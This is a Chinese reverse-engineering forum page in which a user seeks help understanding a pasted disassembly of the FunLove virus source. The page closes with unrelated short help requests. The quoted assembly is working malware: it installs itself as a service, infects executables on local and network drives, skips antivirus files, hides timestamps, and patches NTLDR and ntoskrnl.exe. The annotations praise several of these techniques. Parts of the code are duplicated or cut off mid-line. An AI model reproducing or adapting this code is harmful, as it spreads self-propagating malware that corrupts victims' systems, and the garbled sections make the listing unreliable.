|
[求助]请教这段汇编。。谁能指点迷津?!
[QUOTE=;]...[/QUOTE] FUNLOVE的源代码 Flcss.asm ; ; disasm by Code Demon ; ; Code Demon Virus Dreaming Factory ; ;********************************************************************************************* .586 ASSUME CS:CODE,DS:CODE CODE SEGMENT USE32 VSize equ offset VEnd - VStart Phys_VSize equ 1000 main: ;********************************************************************************************* ; 开始代码 ;********************************************************************************************* VStart: call GetDelta ;此子程序用于取得病毒在内存中的开始地址,是绝大 ;多数病毒都要用到的经典技术只一,对于写一些加密 ;的软件有很大的帮助,莱鸟必看 lea esi,[offset HostCode + ebx] mov edi,[esp] sub edi,08 mov [esp],edi movsd movsd push dword ptr [esp + 04] call RelocKernel32 ;重定位Kernel32 or eax,eax jz short Exit cmp byte ptr [offset OS + ebx],00;判断操作系统的类型 jnz short NT_Srv call Create9xProcess ;建立WIN9X进程 ret NT_Srv: call CreateNTService ;建立NT服务 Exit: ret ;********************************************************************************************* ;建立NT服务的子程序 ;********************************************************************************************* CreateNTService: call RelocAdvapi32 or eax,eax jz short CNT_Failed push 02 push 00 push 00 ; 取服务管理器的句柄 call OpenSCManagerA or eax,eax jz short CNT_Failed mov SCM_Handle,eax call CreateExecutable ;建立FLCSS.EXE, or eax,eax ; 已经驻留内存就退出. jz short CNT_Exit mov edi,0F01FF lea esi,offset [Service + ebx] push edi push esi push SCM_Handle call OpenServiceA or eax,eax jnz short CNT_Run xor eax,eax push eax push eax push eax push eax push eax lea eax,[offset Buffer1 + ebx] ; flcss.exe push eax push 01 ;错误代码 push 02 ; 开始 push 20 ; 类型 push edi push 00 push esi push SCM_Handle ;句柄 call CreateServiceA ;建立服务 or eax,eax jz short CNT_Failed CNT_Run: push 00 push 00 push eax call StartServiceA ;开始服务 or eax,eax jnz short CNT_Exit CNT_Failed: call StartInfectionThread ;传染子程序 CNT_Exit: ret ;********************************************************************************************* ;建立WIN9X进程的子程序 ;********************************************************************************************* Create9xProcess: ;注意了:生成FLCSS.EXE,很多人的机子杀不绝,就是因为它在作怪. call CreateExecutable or eax,eax jz short P9x_Exit P9x_00: xor eax,eax lea edi,[offset Buffer2 + ebx] push edi push edi mov ecx,040 repz stosd mov cl,06 push eax loop $ - 1 lea esi,[offset Buffer1 + ebx] push esi push 00 call CreateProcessA ;创建进程 or eax,eax jnz short P9x_Exit P9x_Failed: call StartInfectionThread;传染子程序 P9x_Exit: ret **************************************************************************** ;注意了:生成FLCSS.EXE,很多人的机子杀不绝,就是因为它在作怪. **************************************************************************** CreateExecutable: lea edi,[offset Buffer1 + ebx] push edi push 104 push edi call GetSystemDirectoryA ;取得系统目录 add edi,eax mov al,‘\‘ stosb lea esi,[offset Process + ebx] movsd movsd movsd push 02 call OpenFile cmp eax,-1 jz short CE_Exit mov c_FileHandle,eax lea edi,[offset VImports + ebx] ;清除 import mov eax,-1 stosd stosd lea edi,[offset Kernel32_Relocated + ebx] ;第二个 import mov eax,[edi - 8] stosd push 00 lea esi,c_BytesWritten push esi push 0200 push ebx push c_FileHandle call WriteFile ; 写文件头 push 00 push esi push 1000 push ebx push c_FileHandle call WriteFile ; 写入病毒主体 push c_FileHandle call CloseHandle ;关闭文件 CE_Exit: inc eax ret ;************************************************************************************ ;以下应该是病毒的服务程序 ;************************************************************************************ VService: call GetDelta push dword ptr [esp] call RelocKernel32 or eax,eax jz VS_Exit cmp byte ptr [offset OS + ebx],00 ;操作系统的类型 jz short W9x_Service_Register ;注册WIN9X服务 WNT_Service_Hacknowledge: call RelocAdvapi32 ;重定位Advapi32 or eax,eax jz VS_Exit lea esi,[offset Buffer1 + ebx] xor eax,eax lea ecx,[offset Service + ebx] lea edx,[offset ServiceDispatcher + ebx] mov [esi],ecx mov [esi + 04],edx mov [esi + 08],eax mov [esi + 0C],eax ; 将控制权返回给调用者 push esi call StartServiceCtrlDispatcherA W9x_Service_Register: lea esi,[offset USER32_Name + ebx] push esi call LoadLibraryA lea esi,[offset RegisterClassA+ ebx] push esi push eax call GetProcAddress ;取进程的地址 or eax,eax jz short VS_00 mov [esi - 06],eax lea esi,[offset Buffer1 + ebx] mov edi,esi xor eax,eax mov ecx,0A repz stosd mov dword ptr [esi + 04],-1 mov dword ptr [esi + 10],400000 ; WINDOWS9X的基址 lea eax,[offset Service + ebx] mov [esi + 24],eax push esi call RegisterClassA ; 这里非常重要 lea esi,[offset RegisterServiceProcess+ ebx] push esi push dword ptr [offset Kernel32_Base + ebx] call GetProcAddress or eax,eax jz short VS_00 mov [esi - 06],eax call GetCurrentProcessId ;取当前进程的ID ; 注册为服务 call GetCurrentProcessId ;取当前进程的ID ; 注册为服务进程,防止被用户 push 01 ;用CTRL+ALR+DEL从任务管理器中发现 push eax call RegisterServiceProcess push 8000 ; 延时 call Sleep VS_00: call StartInfectionThread VS_Exit: ret ;********************************************************************************************* ;NT服务子程序 ;********************************************************************************************* ServiceDispatcher: call GetDelta lea esi,[offset ServiceHandler + ebx] lea edi,[offset Service + ebx] push esi push edi call RegisterServiceCtrlHandlerA mov Service_Handle,eax lea esi,[offset Buffer1 + ebx] mov edi,esi mov ecx,06 xor eax,eax repz stosd mov dword ptr [esi],10 mov dword ptr [esi + 04],04 mov dword ptr [esi + 08],07 push esi push Service_Handle ;告诉WINDOWS服务已经正确的运行 call SetServiceStatus push 8000 call Sleep call StartInfectionThread ;建立进程 ret ServiceHandler: ret ; 当管理员关闭服务时,提示系统出错!好东西!!! ;********************************************************************************************* ;此子程序用于建立线程 ;********************************************************************************************* StartInfectionThread: call GetTickCount mov [offset Rand + ebx],eax lea eax,ThreadId push eax push 0 push 0 lea eax,[offset VThread + ebx] push eax push 0 push 0 call CreateThread ret ;********************************************************************************************* ; 病毒线程 ;********************************************************************************************* VThread: call GetDelta call InfectDrives ;感染本地文件 push 60000 call Sleep call GetRand and al,1F jnz short VThread call InfectNetwork ;感染网络文件 jmp short VThread ;******************************************************************************** ; 通过网络传染的子程序,值得借鉴 ;******************************************************************************** InfectNetwork: lea eax,[offset MPR_Name + ebx] push eax call LoadLibraryA or eax,eax jz short INet_Failed push eax lea esi,[offset MPR_Functions + ebx] push esi call DLL_Relocate or eax,eax jz short INet_Failed push 00 call NetSearch INet_Failed: ret ;********************************************************************************************* ; 此子程序用于测试驱动器是否有效 ;********************************************************************************************* InfectDrives: push esi call GetTickCount mov [offset Tick + ebx],eax lea esi,[offset Buffer1 + ebx] mov dword ptr [esi],‘ \:+ ebx - offset VStart‘ ID_TestDrive: mov byte ptr [esi + 03],00 push esi call GetDriveTypeA ;取驱动器类型 cmp al,03 ;硬盘? jz short ID_DriveOk cmp al,04 ;网络驱动器? jnz short ID_Invalid ID_DriveOk: add esi,03 push esi call BlownAway push esi call FileSearch ;查找文件 sub esi,03 ID_Invalid: mov al,[offset Buffer1 + ebx] inc al mov [offset Buffer1 + ebx],al cmp al,‘Z‘ jna short ID_TestDrive pop esi ret ;********************************************************************************************* ;查找计算机 ;********************************************************************************************* NetSearch : mov EnumBufferSize,4000 or EnumNB_Objects,-1 lea eax,WNetStructAddr push eax push WNetStructAddr push 0 push 0 push 2 call WNetOpenEnumA or eax,eax jnz NET_Close push 04 push 1000 push 4000 push 00 call VirtualAlloc or eax,eax jz short NET_Close mov EnumBufferAddr,eax NET_00: mov esi,EnumBufferAddr lea eax,EnumBufferSize push eax push esi lea eax,EnumNB_Objects push eax push WNetStructAddr call WNetEnumResourceA or eax,eax jnz short NET_Free mov ecx,EnumNB_Objects or ecx,ecx jz short NET_00 NET_01: push ecx push esi mov esi,[esi + 14] ; 计算机名 or esi,esi jz short NET_03 cmp word ptr [esi],0041 ; 是否为软盘 jz short NET_03 lea edi,[offset Buffer1 + ebx] NET_02: movsb cmp byte ptr [esi],00 jnz short NET_02 mov al,‘\‘ stosb push edi call BlownAway push edi call FileSearch NET_03: pop esi mov eax,[esi + 0C] and al,2 cmp al,2 jnz short NET_04 push esi call NetSearch NET_04: add esi,20 pop ecx loop NET_01 jmp short NET_00 NET_Free: push 8000 push 00 push EnumBufferAddr call VirtualFree NET_Close: push WNetStructAddr call WNetCloseEnum ret ;************************************************************************************* ; 查找文件子程序,这些跟以前DOS下没什么区别, ; ; 我还是喜欢用IFS_HOOK,可以做到全隐形哦,那感觉就是一个字--爽! ^_^ ;************************************************************************************* FileSearch: mov eax,CurrentDirEnd mov dword ptr [eax],002A2E2A ; *.* lea edi,[offset Buffer2 + ebx] lea esi,[offset Buffer1 + ebx] push edi push esi call FindFirstFileA ;找第一个文件 cmp eax,-1 jz short RS_Exit RS_00: mov SearchHandle,eax RS_01: test byte ptr [edi],10 ; 测试是目录还是文件 jz short FileTest RS_Directory: cmp byte ptr [edi + 2C],‘.‘ jz short RS_Next mov esi,edi add esi,2C mov edi,CurrentDirEnd RSD_00: movsb cmp byte ptr [esi],0 jnz short RSD_00 mov al,‘\‘ stosb push edi call FileSearch RS_Next: lea edi,[offset Buffer2 + ebx] push edi push SearchHandle call FindNextFileA ;查找下一个文件 or eax,eax jnz short RS_01 push SearchHand RS_Next: lea edi,[offset Buffer2 + ebx] push edi push SearchHandle call FindNextFileA ;查找下一个文件 or eax,eax jnz short RS_01 push SearchHandle call FindClose RS_Exit: ret ;******************************************************************** ;没什么新意,略过吧 ;******************************************************************** FileTest: mov edx,[edi + 2C] or edx,20202020 xor edx,61F81F61 lea esi,[offset SkipNames + ebx] ; 跳过一些反病毒软件的感染 mov ecx,0C FT_00: lodsd cmp edx,eax jz short FT_Exit loop FT_00 ;************************************************************************ ;注意拉, ;************************************************************************ mov esi,edi add esi,2C FT_01: lodsb or al,al jnz short FT_01 mov eax,[esi - 4] ; 扩展名判断 or eax,20202020 cmp eax,‘ xco‘ ;控件 jz short FT_02 cmp eax,‘ rcs‘ ;屏幕保护文件 jz short FT_02 cmp eax,‘ exe‘ ;标准的EXE文件 jnz short FT_Exit FT_02: mov eax,[edi + 20] ; 文件小于2000的就不感染 cmp eax,2000 jc short FT_Exit cmp al,03 ; 检测是否已经感染 jz short FT_Exit lea esi,[offset Buffer1 + ebx] ; 取文件名和路径 lea edi,[offset Buffer3 + ebx] push edi mov ecx,CurrentDirEnd sub ecx,esi repz movsb lea esi,[offset Buffer2 + ebx] add esi,2C FT_03: movsb cmp byte ptr [esi - 1],0 jnz short FT_03 call InfectFile ;干活了, FT_Exit: jmp RS_Next ;***************************************************************************************** ;感染文件子程序 ;***************************************************************************************** InfectFile: push i_Filename push 03 ; 打开文件 call OpenFile cmp eax,-1 jz IN_Exit mov i_FileHandle,eax push 00 push eax call GetFileSize ;取文件大小,用于以后还原 mov i_FileSize,eax cmp al,03 ; 是否感染 jz IN_Exit lea edi,[offset Buffer3 + ebx] push 00 lea esi,i_BytesRead push esi push 2000 push edi push i_FileHandle call ReadFile ;********************************************************************************* ;以下的程序跟文件头有关,建议没基础者找一些相关资料看看 ;********************************************************************************* cmp word ptr [edi],5A4Dh ;DOS文件头,开始有点印象了吧 jnz IN_CloseFile cmp word ptr [edi + 18],0040 ;是否为WINDOWS文件,此处>=40H,则为WINDOWS文件,<40H则为DOS文件 jnz IN_CloseFile cmp dword ptr [edi + 3C],1C00 ; DOS文件头的大小 ja IN_CloseFile add edi,[edi + 3C] ;指向PE或NE文件头 mov eax,[edi] cmp eax,00004550 ;PE文件吗? jnz IN_CloseFile ;此步必须,因为WIN3.X的18H的值也大于等于40H cmp word ptr [edi + 5C],2 ; GUI???? jnz IN_CloseFile mov esi,edi add esi,18 add si,[edi + 14] ; 将ESI指向第一个节表 push esi mov eax,[edi + 28] ; 查找包含"PE"的节表 IN_00: mov ecx,[esi + 0C] add ecx,[esi + 08] cmp eax,ecx jc short IN_01 add esi,28 jmp short IN_00 IN_01: sub eax,[esi + 0C] add eax,[esi + 14] mov i_EP_Offset,eax or [esi + 24],80000000 ; 将它改为可写,这里是WINDOWS跟 ;DOS在程序和数据段上的一个重要改变 ;也是写WINDOWS病毒要注意的地方之一 pop esi xor ecx,ecx mov cx,[edi + 06] dec ecx mov eax,ecx mov edx,28 mul edx add esi,eax ; ESI指向最后一个节表 mov eax,[esi + 24] cmp al,80 ; 是否已经初始化 jz IN_CloseFile or eax,8C000000 ; 将它改为可写, and eax,not 12000000 ; 不共享,不可丢弃 mov [esi + 24],eax mov ecx,i_FileSize ;这里好象跟SFX有点关系 mov edx,ecx mov eax,ecx clc shr eax,03 sub edx,eax sub edx,[esi + 14] jc short IN_02 sub edx,[esi + 10] jnc IN_CloseFile IN_02: ; 重新计算节的长度 mov edx,[esi + 08] sub ecx,[esi + 14] jc short IN_03 cmp edx,ecx ja short IN_03 mov edx,ecx IN_03: test edx,00000FFF jz short IN_04 and edx,0FFFFF000 add edx,1000 IN_04: mov ecx,edx add ecx,[esi + 0C] mov eax,ecx add eax,4000 mov [edi + 50],eax ; 新的长度 sub ecx,[edi + 28] add ecx,offset VStart - 100 - 08 mov i_HostDep32,ecx mov eax,edx add eax,4000 ; 改变虚拟大小 mov [esi + 08],eax mov eax,edx add eax,[esi + 14] mov i_VirusOffset,eax add edx,1000 ; 改变物理大小 mov [esi + 10],edx add edx,[esi + 14] add edx,03 push i_FileHandle push edx call MapFile or eax,eax jz short IN_CloseFile mov i_MapHandle,eax push eax call ViewMap or eax,eax jz short IN_CloseMap mov edx,eax lea esi,[offset Buffer3 + ebx] ; 写PE文件头 mov edi,edx mov ecx,2000 repz movsb lea edi,[offset HostCode + ebx] mov esi,i_EP_Offset add esi,edx movsd movsd mov edi,esi ; 设置CALL GS:Virus sub edi,08 mov eax,00E8659090 stosd mov eax,i_HostDep32 stosd mov edi,edx mov eax,i_FileSize mov ecx,i_VirusOffset sub ecx,eax jna short IN_05 add edi,eax xor al,al repz stosb IN_05: mov esi,ebx ;写入病毒主体 mov edi,edx add edi,i_VirusOffset mov ecx,VSize repz movsb mov ecx,Phys_VSize - VSize + 3 repz stosb push edx call UnmapViewOfFile IN_CloseMap: push i_MapHandle call CloseHandle ;关闭 call Wait_A_Little ;延时 IN_CloseFile: lea esi,[offset Buffer2 + 14 + ebx] ; 恢复文件的时间 push esi sub esi,08 push esi sub esi,08 push esi push i_FileHandle call SetFileTime push i_FileHandle call CloseHandle ;关闭文件 IN_Exit: ret ;******************************************************************************** ; 查找GetProcAddress 的子程序 ;******************************************************************************** Whereis_GPA: lea esi,[offset GPA_Sigs + ebx] mov byte ptr [offset OS + ebx],00 mov eax,w_Kernel32 and eax,0FFF00000 cmp eax,0BFF00000 jnz short OS_WinNT? OS_Win9x: mov edi,0BFF70000 jmp short WG_00 OS_WinNT?: inc byte ptr [offset OS + ebx] add esi,08 cmp eax,077F00000 jnz short OS_Win2K? mov edi,eax jmp short WG_00 OS_Win2K?: inc byte ptr [offset OS + ebx] add esi,08 cmp eax,077E00000 jnz short WG_Failed mov edi,077E80000 WG_00: mov edx,edi mov ecx,20000 WG_01: push ecx mov ecx,08 push esi push edi repz cmpsb pop edi pop esi pop ecx jz short WG_02 inc edi loop WG_01 WG_Failed: xor eax,eax jmp short WG_03 WG_02: add edi,03 mov [offset GetProcAddress + 1 + ebx],edi mov eax,edx mov [offset Kernel32_Base + ebx],eax WG_03: ret ;*************************************************************************************** ;DLL 重定位子程序 ;*************************************************************************************** DLL_Relocate: mov esi,DLL_Func DR_00: mov eax,esi add eax,07 push eax push DLL_Base call GetProcAddress or eax,eax jz short DR_03 DR_01: mov [esi + 1],eax add esi,07 DR_02: lodsb or al,al jnz short DR_02 cmp byte ptr [esi],0B8 jz short DR_00 DR_03: ret ;********************************************************************************************** ; 修改NTLDR,这可是Funlove的必杀技噢,虽然我不喜欢这种做法,但还是看看吧 ;********************************************************************************************** BlownAway: lea esi,[offset NTLDR + ebx] mov edi,DirEnd movsd movsd lea edi,[offset Buffer1 + ebx] lea esi,[offset NT4_NTLDR + ebx] cmp byte ptr [offset OS + ebx],01 jz short BA_00 add esi,10 BA_00: push edi push esi push 05 call PatchFile lea esi,[offset NTOSKRNL + ebx] mov edi,DirEnd BA_01: movsb cmp byte ptr [esi - 1],00 jnz short BA_01 lea edi,[offset Buffer1 + ebx] lea esi,[offset NT4_NTOSKRNL + ebx] cmp byte ptr [offset OS + ebx],01 jz short BA_02 add esi,18 BA_02: push edi push esi push 09 call PatchFile ret PatchFile: push p_Filename push 03 ; 打开文件 call OpenFile cmp eax,-1 jz short PA_Exit mov p_FileHandle,eax push 00 push eax call GetFileSize ;取文件大小 mov p_FileSize,eax push p_FileHandle push eax call MapFile or eax,eax jz short PA_CloseFile mov p_MapHandle,eax push eax call ViewMap or eax,eax jz short PA_CloseMap mov edx,eax mov edi,eax mov esi,p_PatchAddr mov ecx,p_FileSize PA_00: push ecx push esi push edi mov ecx,p_PatchSize repz cmpsb pop edi pop esi pop ecx jz short PA_01 inc edi loop PA_00 jmp short PA_Unmap PA_01: mov ecx,p_PatchSize add esi,ecx repz movsb PA_Unmap: push edx call UnmapViewOfFile PA_CloseMap: push p_MapHandle call CloseHandle PA_CloseFile: push p_FileHandle call CloseHandle ;关闭文件 PA_Exit: ret ;********************************************************************************************** ;此子程序用于取病毒在内存中的开始地址,经典技术 ;********************************************************************************************** GetDelta: call delta delta: pop ebx sub ebx,offset delta - VStart ret ;********************************************************************************************** ;以下应该是重定位Kernel32的子程序,WINDOWS病毒惯用的手法 ;********************************************************************************************** RelocKernel32: push r_Kernel32 call Whereis_GPA or eax,eax jz short RK_00 push eax lea esi,[offset Kernel32_Functions + ebx] push esi call DLL_Relocate RK_00: ret ;********************************************************************************************** ; 以下是重定位Advapi32的子程序 ;********************************************************************************************** RelocAdvapi32: lea eax,[offset ADVAPI32_Name + ebx] push eax call LoadLibraryA or eax,eax jz short RA_00 push eax lea esi,[offset ADVAPI32_Functions + ebx] push esi call DLL_Relocate RA_00: ret ;********************************************************************************************** ; 打开文件子程序 ;********************************************************************************************** OpenFile: push 20 push o_Filename call SetFileAttributesA push 00 push 80 ; 普通属性 push o_OpenMode push 00 push 00 ; 不共享, push 0C0000000 ; 读写方式 push o_Filename call CreateFileA ret ;********************************************************************************************** ; 建立文件影象,找点资料看看吧 ;********************************************************************************************** MapFile: push 00 push m_FileSize push 00 push 04 push 00 push m_FileHandle call CreateFileM ;********************************************************************************************** ; 建立文件影象,找点资料看看吧 ;********************************************************************************************** MapFile: push 00 push m_FileSize push 00 push 04 push 00 push m_FileHandle call CreateFileMappingA ret ViewMap: push 00 push 00 push 00 push 02 push v_MapHandle call MapViewOfFile ret ;********************************************************************************************** ; 延时,没什么说的了 ;********************************************************************************************** Wait_A_Little: call GetTickCount sub eax,[offset Tick + ebx] cmp eax,4000 jc short WAL_00 push 16000 call Sleep call GetTickCount mov [offset Tick + ebx],eax WAL_00: ret GetRand: push ecx push edx mov eax,[offset Rand + ebx] xor edx,edx mov ecx,7FFFFFFF mul ecx inc eax mov ecx,0FFFFFFFBh div ecx mov eax,edx mov [offset Rand + ebx],eax pop edx pop ecx ret ;********************************************************************************************** ;以下是一些数据 ;********************************************************************************************** HostCode db 8 dup (?) GPA_Sigs: W9x db 0C2,04,00,57,6A,22,2Bh,0D2 NT4 db 0C2,04,00,55,8Bh,4C,24,0C W2K db 00F,00,00,55,8Bh,0ECh,51,51 NTLDR db ‘NTLDR‘,0 NT4_NTLDR db 3Bh,46,58,74,07 ;WINDOWS_NT4的NTLDR的标志 db 3Bh,46,58,0EBh,07 W2K_NTLDR db 3Bh,47,58,74,07 db 3Bh,47,58,0EBh,07 ;WIN2K的NTLDR的标志 NTOSKRNL db ‘WINNT\System32\ntoskrnl.exe‘,0 NT4_NTOSKRNL db 8A,0C3,5F,5E,5Bh,5Dh,0C2,28,00 ;标志 db 0B0,01,5F,5E,5Bh,5Dh,0C2,28,00 W2K_NTOSKRNL db 8A,45,14,5F,5E,5Bh,5Dh,0C2,28 ;同上 db 0B0,01,90,5F,5E,5Bh,5Dh,0C2,28 ;********************************************************************************************** ;以下是一些杀毒软件的文件不感染,你可以加点国产的杀毒软件的名字, ;********************************************************************************************** SkipNames: dd 139D7300h ; aler dd 0F977200h ; amon dd 118E7E1Eh ; _avp dd 52886900h ; avp3 dd 0C886900h ; avpm dd 13883207h ; f-pr dd 168E7E0Fh ; navw dd 0F997C12h ; scan dd 128B7212h ; smss dd 04907B05h ; ddhe dd 00946F05h ; dpla dd 00946F0Ch ; mpla Process db ‘flcss.exe‘,0 Service db ‘FLC‘,0 ; Import节表 VImports: dd offset Kernel32_Pointers dd -1,-1 dd offset Kernel32_Name dd offset Kernel32_Relocated db 14 dup (0) Kernel32_Pointers dd offset Kernel32_Beep Kernel32_Relocated dd offset Kernel32_Beep Kernel32_Beep db ?,?,‘Beep‘,0 ;********************************************************************************************* ; 病毒要调用的一些API,找点资料啃一啃吧,MASM32里的INC文件你能啃完的话,你就是绝顶高手了, ; ; 注: 绝顶高手--------没有头发的高手 ;********************************************************************************************* Kernel32_Name db ‘KERNEL32.dll‘,0 Kernel32_Functions: CloseHandle: db 0B8,4 dup(?),0FF,0E0,‘CloseHandle‘,0 CreateFileA: db 0B8,4 dup(?),0FF,0E0,‘CreateFileA‘,0 CreateFileMappingA: db 0B8,4 dup(?),0FF,0E0,‘CreateFileMappingA‘,0 CreateProcessA: db 0B8,4 dup(?),0FF,0E0,‘CreateProcessA‘,0 CreateThread: db 0B8,4 dup(?),0FF,0E0,‘CreateThread‘,0 FindFirstFileA: db 0B8,4 dup(?),0FF,0E0,‘FindFirstFileA‘,0 FindNextFileA: db 0B8,4 dup(?),0FF,0E0,‘FindNextFileA‘,0 FindClose: db 0B8,4 dup(?),0FF,0E0,‘FindClose‘,0 GetCurrentProcessId: db 0B8,4 dup(?),0FF,0E0,‘GetCurrentProcessId‘,0 GetDriveTypeA: db 0B8,4 dup(?),0FF,0E0,‘GetDriveTypeA‘,0 GetFileSize: db 0B8,4 dup(?),0FF,0E0,‘GetFileSize‘,0 GetProcAddress: db 0B8,4 dup(?),0FF,0E0,‘GetProcAddress‘,0 GetTickCount: db 0B8,4 dup(?),0FF,0E0,‘GetTickCount‘,0 GetSystemDirectoryA: db 0B8,4 dup(?),0FF,0E0,‘GetSystemDirectoryA‘,0 LoadLibraryA: db 0B8,4 dup(?),0FF,0E0,‘LoadLibraryA‘,0 MapViewOfFile: db 0B8,4 dup(?),0FF,0E0,‘MapViewOfFile‘,0 ReadFile: db 0B8,4 dup(?),0FF,0E0,‘ReadFile‘,0 SetFileAttributesA: db 0B8,4 dup(?),0FF,0E0,‘SetFileAttributesA‘,0 SetFileTime: db 0B8,4 dup(?),0FF,0E0,‘SetFileTime‘,0 Sleep: db 0B8,4 dup(?),0FF,0E0,‘Sleep‘,0 UnmapViewOfFile: db 0B8,4 dup(?),0FF,0E0,‘UnmapViewOfFile‘,0 VirtualAlloc: db 0B8,4 dup(?),0FF,0E0,‘VirtualAlloc‘,0 VirtualFree: db 0B8,4 dup(?),0FF,0E0,‘VirtualFree‘,0 WriteFile: db 0B8,4 dup(?),0FF,0E0,‘WriteFile‘,0 ;注:下面的API在WIN9X中是没有的 db 0 RegisterServiceProcess: db 0B8,4 dup(?),0FF,0E0,‘RegisterServiceProcess‘,0 USER32_Name db ‘USER32.dll‘,0 RegisterClassA: db 0B8,4 dup(?),0FF,0E0,‘RegisterClassA‘,0 ADVAPI32_Name db ‘ADVAPI32.dll‘,0 ADVAPI32_Functions: OpenSCManagerA: db 0B8,4 dup(?),0FF,0E0,‘OpenSCManagerA‘,0 OpenServiceA: db 0B8,4 dup(?),0FF,0E0,‘OpenServiceA‘,0 CreateServiceA: db 0B8,4 dup(?),0FF,0E0,‘CreateServiceA‘,0 StartServiceA: db 0B8,4 dup(?),0FF,0E0,‘StartServiceA‘,0 StartServiceCtrlDispatcherA: db 0B8,4 dup(?),0FF,0E0,‘StartServiceCtrlDispatcherA‘,0 RegisterServiceCtrlHandlerA: db 0B8,4 dup(?),0FF,0E0,‘RegisterServiceCtrlHandlerA‘,0 SetServiceStatus: db 0B8,4 dup(?),0FF,0E0,‘SetServiceStatus‘,0 MPR_Name db ‘MPR.dll‘,0 MPR_Functions: WNetOpenEnumA: db 0B8,4 dup(?),0FF,0E0,‘WNetOpenEnumA‘,0 WNetEnumResourceA: db 0B8,4 dup(?),0FF,0E0,‘WNetEnumResourceA‘,0 WNetCloseEnum: db 0B8,4 dup(?),0FF,0E0,‘WNetCloseEnum‘,0 ;病毒应该是在这里就结束了 vend: Kernel32_Base dd ? Rand dd ? Tick dd ? OS db ? ALIGN 100 Buffer1 db 200 dup (0) ; 此处应该是用于存放当前目录 Buffer2 db 200 dup (?) Buffer3 db 2000 dup (?) ;此处用于存放读入的文件 CODE ENDS END main -- ※ 来源:·安全焦点讨论区 www.xfocus.org· Trackback: http://tb.donews.net/TrackBack.aspx?PostId=705243 |
|
|
|
[求助]win32xp系统下用VISTUAL STUDIO 2005编译一段代码出现这样的错误:
引用答案: 在编译ACE工程的时候,总是出现error prj0003错误,找了好久终于得到解决方法, : 简单的方法:先关掉VS2005 就是去Documents and Settings目录查找VCComponents_v1.dat文件,删除掉,重启VS2005即可。 文章出处:http://www.diybl.com/course/4_webprogram/asp.net/asp_netshl/2008515/116073.html |
|
[求助]请教这段汇编。。谁能指点迷津?!
看来这个版块没人回答我。。我重发去win32/64汇编版块了。。请版主删了此贴吧。。 |
|
[求助]请教这段汇编。。谁能指点迷津?!
为什么没人回答啊~~~~~~ 没人帮我吗?。。 |
|
[求助]请帮我看下这个CrackMe
..哎.看到那个答案了..这么复杂..还要和32异或,再xor3次,真累..看的头晕 |
|
|
|
[求助]病毒程序中的问题。谢谢
咋没人帮我哦 看不懂程序好烦啊。 |
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值